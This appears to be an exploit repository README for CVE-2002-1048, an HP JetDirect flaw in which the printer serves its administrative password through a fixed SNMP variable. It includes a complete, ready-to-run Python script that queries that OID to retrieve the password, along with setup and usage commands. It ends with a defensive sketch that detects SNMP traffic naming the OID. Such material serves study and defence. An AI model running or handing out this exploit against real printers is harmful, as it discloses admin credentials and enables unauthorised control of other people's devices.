PRIMARY CATEGORY → EXPLOITS
CVE-2002-1048 💥 → HP JetDirect Printer
Attack Vector 🗡️ → Information Disclosure/Leakage through an SNMP Query
Affected Versions 🚨 → Lower than X.22.09v
Severity 🚩 → e.g. High 7.5/10
Information
Overview
Hewlett Packard (HP) printers store sensitive administrative account information in a variable that is served to any user that makes a certain SNMP request.
Description
HP JetDirect-enabled printers are configurable via HTTP and Telnet and accept SNMP requests. These printers store the administrative account password in an SNMP variable that can be read by any remote user that knows the address of the printer and the location of the variable. The location of the variable is unchanging.
CVSS v2.0 Score
TL;DR → (AV:N/AC:L/Au:N/C:P/I:P/A:P)
| CVSS Base Metrics | Values |
|---|---|
| Access Vector (AV) | Network |
| Access Complexity (AC) | Low |
| Authentication (AU) | None |
| Confidentiality (C) | Partial |
| Integrity (I) | Partial |
| Availability (A) | Partial |
Setup
```bash
python3 -m venv ./venv
source ./venv/bin/activate
pip install -r ./requirements.txt
```
Usage
Help Display
```bash
python3 CVE-2002-1048.py --help
```
Script Execution
```bash
python3 CVE-2002-1048.py <HOST> <SNMPV2C_COMMUNITY_STRING>
```
Code
Exploit
```python
#!/usr/bin/env python3
import argparse
import asyncio
import sys

from puresnmp import Client, V2C, PyWrapper
from colorama import Fore, Style
from pwn import log


def banner() -> str:
    # Raw f-string: the backslashes in the ASCII art are literal, not escape sequences
    return rf"""{Fore.GREEN}
  ______   ______    ___  ___  ___  ___    ______  ____ ___
 / ___/ | / / __/___|_  |/ _ \/ _ \|_  |__<  / _ \/ / /( _ )
/ /__ | |/ / _//___/ __// // / // / __/___/ / // /_  _/ _  |
\___/ |___/___/   /____/\___/\___/____/  /_/\___/ /_/ \___/
{Style.RESET_ALL}"""


async def getOID(host: str, comm_string: str, oid: str) -> str:
    """
    This function creates a Client object for the SNMP agent, wrapped in the PyWrapper class

    > Note that PyWrapper takes a Client as an argument and makes its methods return plain Python types

    A GET SNMP request is then made by calling the get method of the Client object

    It returns the value associated with the requested OID
    """
    try:
        client = PyWrapper(Client(host, V2C(comm_string)))
        response = await client.get(oid)
        return response.decode()
    except Exception as e:
        raise RuntimeError(Fore.RED + f"Error: {e}" + Style.RESET_ALL) from e


async def main() -> None:
    oid = ".1.3.6.1.4.1.11.2.3.9.1.1.13.0"

    print(banner())

    parser = argparse.ArgumentParser(
        description=Fore.MAGENTA
        + "This tool queries via SNMPv2c a specific OID value which corresponds "
        "to the admin passwd for the web and telnet services"
        + Style.RESET_ALL
    )
    parser.add_argument('host', help='SNMP Agent')
    parser.add_argument('community_string', help='SNMPv2c Community String')
    opts = parser.parse_args()

    if len(sys.argv) != 3:
        parser.print_help()
        sys.exit(1)

    print(
        Fore.CYAN
        + f"""Target → {Fore.MAGENTA}{opts.host}{Fore.CYAN}
Community String → {Fore.MAGENTA}{opts.community_string}{Fore.CYAN}
OID → {Fore.MAGENTA}{oid}
"""
        + Style.RESET_ALL
    )

    # pwntools progress logger, used only for status output
    p = log.progress(Fore.CYAN + "SNMPv2C" + Style.RESET_ALL)
    p.status(
        Fore.MAGENTA
        + f"Requesting the OID to {Fore.YELLOW}{opts.host}{Fore.MAGENTA} using "
        f"{Fore.YELLOW}{opts.community_string}{Fore.MAGENTA} as Community String... ⌛"
        + Style.RESET_ALL
    )
    await asyncio.sleep(2)

    print(
        "\n",
        Fore.CYAN + f"{oid}" + Style.RESET_ALL,
        " = ",
        Fore.GREEN + await getOID(opts.host, opts.community_string, oid) + Style.RESET_ALL,
        "\n"
    )


if __name__ == '__main__':
    asyncio.run(main())
```
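
Because the variable's location never changes, SNMP traffic that names it can be recognised on the wire. The following detection-side sketch is an added example, not part of the original repository: it decodes an SNMPv1/v2c UDP payload with a minimal BER reader and reports whether any varbind names the OID the script reads, covering responses as well as requests. The function names (`parse_snmp`, `names_password_oid`) and the sample packet are constructed for this illustration.

```python
WATCHED_OID = "1.3.6.1.4.1.11.2.3.9.1.1.13.0"  # OID read by the script above, no leading dot
PDU_NAMES = {0xA0: "GetRequest", 0xA1: "GetNextRequest", 0xA2: "Response", 0xA5: "GetBulkRequest"}
# Constructed sample: UDP payload of an SNMPv2c GetRequest for WATCHED_OID, community "public"
SAMPLE_GET = bytes.fromhex("302b02010104067075626c6963a01e020101020100020100"
                           "30133011060d2b060104010b02030901010d000500")

def read_tlv(buf: bytes, pos: int):
    """Return (tag, value, next_pos) for the BER element that starts at pos."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:  # long form: low 7 bits count the length bytes that follow
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    if pos + length > len(buf):
        raise ValueError("truncated BER element")
    return tag, buf[pos:pos + length], pos + length

def children(buf: bytes):
    """Yield (tag, value) for each BER element packed back to back in buf."""
    pos = 0
    while pos < len(buf):
        tag, value, pos = read_tlv(buf, pos)
        yield tag, value

def decode_oid(value: bytes) -> str:
    """Turn BER OID content bytes into dotted notation."""
    arcs, sub = [], 0
    for byte in value:
        sub = (sub << 7) | (byte & 0x7F)
        if not byte & 0x80:  # high bit clear marks the end of a sub-identifier
            arcs.append(sub)
            sub = 0
    first = min(arcs[0] // 40, 2)  # the first two arcs share one sub-identifier
    return ".".join(map(str, [first, arcs[0] - 40 * first, *arcs[1:]]))

def parse_snmp(payload: bytes):
    """Return (community, pdu_name, oids) for an SNMPv1/v2c message, else None."""
    try:
        _, msg = next(children(payload))                             # outer SEQUENCE
        (_, _), (_, community), (pdu_tag, pdu) = children(msg)       # version, community, PDU
        *_, (_, varbinds) = children(pdu)                            # last field is the varbind list
        oids = [decode_oid(next(children(vb))[1]) for _, vb in children(varbinds)]
        return community.decode(errors="replace"), PDU_NAMES[pdu_tag], oids
    except (IndexError, KeyError, ValueError, StopIteration):
        return None  # not SNMPv1/v2c, malformed, or a PDU type this sketch ignores

def names_password_oid(payload: bytes) -> bool:
    parsed = parse_snmp(payload)  # True only when a varbind names WATCHED_OID
    return parsed is not None and WATCHED_OID in parsed[2]
```

Matching on responses matters because a walk never requests the OID by name, yet the agent's reply still carries it in a varbind.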